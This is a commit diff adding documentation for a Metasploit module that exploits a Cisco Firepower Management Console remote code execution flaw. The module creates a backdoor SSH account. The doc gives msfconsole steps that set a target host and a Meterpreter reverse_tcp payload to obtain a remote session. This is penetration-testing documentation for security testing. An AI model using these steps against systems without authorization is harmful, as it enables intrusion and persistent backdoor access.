Add doc
parent
45c3c48b7b
commit
a59ca569e7
|
@ -0,0 +1,23 @@
|
|||
This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
|
||||
create a backdoor SSH account via HTTPS, and then obtain a native payload session
|
||||
in SSH.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
|
||||
virtual appliance here:
|
||||
|
||||
https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
|
||||
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. ```use exploit/linux/http/cisco_firepower_useradd```
|
||||
3. ```set password [https console password for admin]```
|
||||
4. ```set rhost [IP]```
|
||||
5. ```set payload linux/x86/meterpreter/reverse_tcp```
|
||||
6. ```set lhost [IP]```
|
||||
7. ```exploit```
|
||||
8. You should get a session
|
Loading…
Reference in New Issue